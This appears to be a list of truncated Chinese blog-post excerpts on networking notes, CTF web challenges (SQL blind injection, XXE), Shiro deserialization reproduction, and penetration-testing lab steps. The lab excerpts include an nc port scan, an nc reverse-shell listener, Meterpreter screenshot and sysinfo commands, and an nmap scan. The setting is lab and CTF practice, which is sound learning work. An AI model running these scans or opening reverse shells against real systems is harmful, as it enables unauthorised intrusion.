Shiro反序列化复现shiro版本: 1.2.4 修改shiro/samples/web/pom.xml 1. 下载源码使用IdEA打开mvn项目 2. 设置run/debug cnfigures 添加war包 3. 运行程序

网络层：数据平面1. 网络层概述: 如图所示，假设H1正在向H2发送信息，H1中的网络层接收来自H运输层的报文段，将每个报文段封装称一个数据报，然后向相邻的路由器R1发送该数据报，在H2接收方，网络层接受来自相邻路由器R2的数据报，提取出运

web487 读取源码，发现username存在sql盲注，跑脚本 import requests url = "http://df8c5989-6a5e-4cb0-896c-1c36c71fa377.challenge.ctf.sho

运输层 运输层为运行在不同主机上的应用进程之间提供了逻辑通信 1. 运输层的服务1.1 运输层和网络层的关系网络层提供了主机到主机的逻辑通信，运输层提供了应用进程到应用进程之间的逻辑通信(端口到端口) 1.2 因特网运输层协议概述 两种协

/proc /proc文件系统下的多种文件提供的系统信息不是针对某个特定的进程，而是能在整个系统范围上下问中使用。可以使用的文件随系统配置的变化而变化。命令procinfo能够显示给予其中某些文件的多种系统信息 /proc/cmline

nc命令: 端口扫描: nc -z -v -n 192.168.21.135 1-100 -z参数告诉nc使用0输入/输出模式 -v参数显示指令的执行过程 -n参数告诉nc不实用DNS反向查询ip地址的域名 2. 作为通信使用：serv

常见命令: 在任意位置使用help可以获得Meterpreter命令的帮助 1. 截屏：meterpreter > screenshot 2. sysinfo这个命令可以获取系统运行的平台 meterpreter > sysinfo C

web374 题目源码: error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(i

树节点只有数据部分和左右子树，没有指向双亲的指针 栈结构是一串数组 pop并没有删除只是返回栈指针下一位的数组元素 // // main.c // 二叉树 // #include <stdio.h> #include<

1. 实验条件:两台unix虚拟机: * Ubuntu：192.168.220.16 * Centos: 192.168.220.4 Centos： 本地监听: * nc -lvp 6767 Ubuntu： 受害端生成反弹shel

No space left on devicesudo su cd / du -sh * #找到所占空间比较大的目录， cd 目录 du -sh *#找到占用空间大的文件，删除一些不需要的文件 Access denied for us

攻击Metasploit主机nmap扫描:msf6>nmap -sT -A -P0 192.168.220.20 Host discovery disabled (-Pn). All addresses will be marked